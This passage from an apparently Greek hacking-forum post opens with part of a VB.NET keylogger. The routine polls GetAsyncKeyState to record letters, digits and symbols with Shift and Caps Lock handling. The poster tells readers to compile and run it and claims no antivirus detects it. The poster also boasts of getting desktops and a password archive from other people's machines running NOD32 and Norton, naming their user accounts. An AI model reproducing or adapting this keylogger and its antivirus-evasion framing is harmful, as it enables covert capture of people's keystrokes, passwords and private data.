GetAsyncKeyState(221) If Pressed = -32767 Then If getShift() = False Then Key = "]" Else Key = "}" End If GoTo KeyFound End If Pressed = GetAsyncKeyState(219) If Pressed = -32767 Then If getShift() = False Then Key = "[" Else Key = "{" End If GoTo KeyFound End If For i = 65 To 128 Pressed = GetAsyncKeyState(i) If Pressed = -32767 Then If getShift() = False Then If getCapslock() = True Then Key = UCase(Chr(i)) Else Key = LCase(Chr(i)) End If Else If getCapslock() = False Then Key = UCase(Chr(i)) Else Key = LCase(Chr(i)) End If End If GoTo KeyFound End If Next i For i = 48 To 57 Pressed = GetAsyncKeyState(i) If Pressed = -32767 Then If getShift() = True Then Select Case Val(Chr(i)) Case 1 Key = "!" Case 2 Key = "@" Case 3 Key = "#" Case 4 Key = "$" Case 5 Key = "%" Case 6 Key = "^" Case 7 Key = "&" Case 8 Key = "*" Case 9 Key = "(" Case 0 Key = ")" End Select Else Key = Chr(i) End If GoTo KeyFound End If Next i Exit Sub KeyFound: If Key <> "" Then Form1.TextBox1.AppendText(Key) End If End Sub End Class Ορίστε η απόδειξη κάντο compile + Run στο Visual Studio 2008 κανένα antivirus δεν το αναγνωρίζει (virustotal scan) Πως νομίζεις οτι πήρα αυτα τα πανέμορφα Desktops: OEMPC\Administrator Έχει ανοιχτο το NOD 32... GSRV-A20522BD92\Administrator LAPTOP\Αντώνης Έχει ανοιχτο το Norton Internet Security... (Κρίμας το kodikoi.rar είναι password protected)
Προτεινόμενες αναρτήσεις
Αρχειοθετημένο
Αυτό το θέμα έχει αρχειοθετηθεί και είναι κλειστό για περαιτέρω απαντήσεις.